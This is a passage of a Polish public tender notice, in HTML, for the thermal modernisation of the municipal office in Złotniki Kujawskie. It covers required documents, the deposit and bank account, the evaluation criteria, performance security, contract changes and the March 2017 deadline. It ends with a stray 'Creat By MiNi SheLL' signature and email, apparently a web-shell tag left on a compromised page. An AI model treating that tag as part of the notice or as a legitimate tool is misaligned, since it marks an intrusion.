                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1) dokumenty potwierdzające, że  wykonawca jest ubezpieczony od odpowiedzialności cywilnej w
zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną
przez zamawiającego.
2)wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności
odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z
informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (sporządzonego według wzoru zamawiającego).

3) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem    
    terminu składania ofert , a jeżeli okres   prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju,wartości,  daty,  miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane (sporządzonego według wzoru zamawiającego), z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności  informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i  prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1) Formularz ofertowy wypełniony i podpisany z wykorzystaniem wzoru - Załącznik nr 1
2) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu   - Załącznik nr 2 oraz oświadczenie o nie podleganiu wykluczeniu - Załącznik nr 3 wypełnione i podpisane przez Wykonawcę
3) Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę , o ile nie wynika z przepisów prawa lub z przedstawionych dokumentów  rejestrowych
4) Dowód wniesienia wadum
5)W terminie 3 dni od dnia przekazania informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, Wykonawca przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w ust. 1 pkt 23 ustawy Pzp (sporządzone według wzoru Zamawiającego stanowiącego załącznik nr 4  do SIWZ)
       Wraz ze złożeniem oświadczenia , Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą  nie prowadzą do zakłócenia  konkurencji w niniejszym postępowaniu.

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Zamawiający wymaga wniesienia wadium. Wadium wnosi się przed upływem terminu składania ofert.
2. Ustala się wadium dla całości zamówienia w wysokości: 16.000,00 zł.
    słownie: szesnaście tysięcy złotych 00/100
3. Wadium może być wniesione w jednej lub kilku następujących formach, w zależności od  
    wyboru Wykonawcy:
1) w pieniądzu;
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że   
    poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) w gwarancjach bankowych
4) w gwarancjach ubezpieczeniowych
5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9
    listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r. poz. 1804
    oraz z 2015 r. poz. 978 i 1240)
4.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:
    Bank Spółdzielczy
    numer rachunku:  32  8142 1059  0000  1935  2000  0004
    z adnotacją: wadium  Termomodernizacja budynku Urzędu Gminy w Złotnikach Kujawskich  
5. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.

6. Wadium wniesione w pieniądzu należy  złożyć z odpowiednim wyprzedzeniem, tak aby wpłynęło ono
    na rachunek bankowy Zamawiającego przed upływem terminu składania ofert.
    Powyższe zalecenie wynika z czasu trwania rozliczeń międzybankowych. Za termin wniesienia wadium   
     w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego.
7. Wadium wniesione w pieniądzu, zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku
     bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku
     bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez
     wykonawcę.
8. Wadium złożone w formie innej niż pieniądz, należy złożyć w formie oryginału, razem z ofertą
    w osobnej kopercie.
9. Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno zawierać
    stwierdzenie, że  na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium
    zgodnie z warunkami specyfikacji istotnych warunków zamówienia, następuje jego bezwarunkowa
    wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela.
10. W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium
(niewniesienie wadium lub wniesienie w sposób nieprawidłowy) oferta wykonawcy podlegać będzie
odrzuceniu.
11. Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze oferty
najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została
wybrana jako najkorzystniejsza.
12. Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci wadium
niezwłocznie po zawarciu umowy.
13. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed
upływem terminu składania ofert.
14. Zamawiający zatrzymuje wadium wraz z odsetkami, w przypadku wystąpienia przesłanek określonych
w art. 46 ust 4a i 5 ustawy Pzp.
15. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46
Prawa zamówień publicznych.

</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px">Postanowienia umowy zawarto w: wzorze umowy, który stanowi - Załącznik nr 7</div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px">1.Zamawiający przewiduje wniesienie zabezpieczenia należytego wykonania umowy, które służyć będzie
   pokryciu roszczeń z tytułu niewykonania lub nienależytego umowy.
2.Od wykonawcy, którego oferta zostanie uznana jako najkorzystniejsza wymagane będzie wniesienie,
    w określonym terminie, przed podpisaniem umowy zabezpieczenia należytego wykonania umowy
    w wysokości: zabezpieczenie w wysokości  9% ceny całkowitej podanej w ofercie przedstawionej przez
    wykonawcę. 
3.Zabezpieczenie należytego wykonania umowy wnoszone jest w jednej lub kilku następujących formach:

3.1) w pieniądzu, przelewem na rachunek bankowy:
 Nr numer rachunku:  32  8142 1059  0000  1935  2000  0004

dane i numer rachunku bankowego zamawiającego dla zabezpieczenia z adnotacją "zabezpieczenie
należytego wykonania umowy   "Termomodernizacja budynku Urzędu Gminy w Złotnikach Kujawskich"
    a ksero dokumentu przedstawić przed podpisaniem umowy
3.2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z
tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3.3) w gwarancjach bankowych,
3.4) w gwarancjach ubezpieczeniowych,
3.5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9
listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
4. Sposób przekazania zabezpieczenia w formie innej niż pieniądz:
Urząd Gminy Złotniki Kujawskie
ul. Powstańców Wielkopolskich 6,88-180 Złotniki Kujawskie  pok. 11 parter.
5.Zwrot zabezpieczenia należytego wykonania umowy nastąpi w terminie 30 dni od dnia wykonania
   zamówienia i uznania przez zamawiającego za należycie wykonane zadanie pn. Termomodernizacja    
   budynku Urzędu Gminy w Złotnikach Kujawskich" , z zastrzeżeniem kwoty 30% wysokości   
   zabezpieczenia, która pozostawiona zostanie na zabezpieczenie roszczeń z tytułu rękojmi za wady.    
   Pozostawiona kwota zostanie zwrócona nie później niż 15 dni po upływie rękojmi za wady.
6.Jeżeli o udzielenie zamówienia ubiegają się wykonawcy występujący wspólnie, ponoszą oni solidarną
    odpowiedzialność za wniesienie zabezpieczenia należytego wykonania umowy.
7.Jeżeli wyłoniony wykonawca nie wniesie w określonym terminie zabezpieczenia należytego wykonania
   umowy zamawiający może wybrać ofertę najkorzystniejszą spośród pozostałych ofert, bez
   przeprowadzania ich ponownej oceny, chyba, że zachodzi jedna z przesłanek unieważnienia   
   postępowania.
8.W zakresie zabezpieczenia należytego wykonania umowy obowiązują uregulowania Prawa zamówień
   publicznych zawarte w art. od 147 do 151.
</div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />.Zamawiający, poza możliwością zmiany zawartej umowy na podstawie art. 144 ust. 1 pkt 2, 3, 4, 5, 6
   ustawy Pzp, przewiduje również możliwość dokonywania zmian postanowień zawartej umowy, także w
   stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących
   okolicznościach:
1) zmiana terminów wykonania umowy:
1.1) zmiany wynikające z warunków atmosferycznych, które spowodowały niezawinione i niemożliwe do
       uniknięcia przez Wykonawcę opóźnienie, w szczególności:
    a) klęsk żywiołowych,
    b) warunków atmosferycznych odbiegających od typowych dla danej pory roku, uniemożliwiających
        prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów;
    c) wystąpienie innych szczególnych okoliczności, za które Wykonawca nie jest odpowiedzialny;
1.2) zmiany spowodowane nieprzewidzianymi w SIWZ warunkami  terenowymi, które
       spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w   
       szczególności:
    a) wystąpienie w trakcie prowadzenia robót klęsk żywiołowych,
    b) wystąpienie odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w
       szczególności istnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych podziemnych 
       urządzeń, instalacji lub obiektów infrastrukturalnych;
1.3) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, które spowodowały
       niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności:
     a) wstrzymaniem robót przez Zamawiającego w okolicznościach, za które nie ponosi Wykonawca   
        żadnej odpowiedzialności; 
     b) konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji
         technicznej wykonania i odbioru robót  niezbędnych  do prawidłowego wykonania  przedmiotu   
        umowy;
    c) wystąpienie innych szczególnych okoliczności, za które Wykonawca  nie jest odpowiedzialny, 

1.4) inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące brakiem
       możliwości prowadzenia robót  lub wykonywania innych czynności przewidzianych umową,
       które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie;

2) zmiana sposobu spełnienia świadczenia:
2.1)  zmiana osób wskazanych w ofercie wykonawcy lub w umowie, przy pomocy których wykonawca
       realizuje przedmiot umowy, na inne osoby spełniające warunki określone w specyfikacji istotnych
      warunków zamówienia, według polityki kadrowej wykonawcy.
2.2) zmiana adresu/siedziby/firmy Zamawiającego/Wykonawcy,
3) pozostałe zmiany spowodowane następującymi okolicznościami:
a) zmiana obowiązującej stawki VAT,
b) wprowadzenia lub zmiany podwykonawcy lub dalszego podwykonawcy robót lub usług lub dostaw,

2.Wszystkie powyższe  postanowienia stanowią katalog zmian 
3.Wszystkie powyższe postanowienia stanowią katalog zmian, na które   Zamawiający może wyrazić  
   zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.

4.Zamawiający przewiduje również możliwość dokonywania nieistotnych zmian postanowień umowy,
    które nie dotyczą treści oferty, na podstawie której dokonano wyboru Wykonawcy.
5.Nie stanowi zmiany umowy:
1) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku
     bankowego);
2) zmiana danych teleadresowych.
6.Strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do udokumentowania
   zaistnienia okoliczności, o których mowa w ust. 1. Wniosek o zmianę postanowień umowy musi być
   wyrażony na piśmie.
7. Zmiana umowy może nastąpić wyłącznie w formie pisemnego aneksu pod rygorem nieważności.

<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 14/03/2017, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com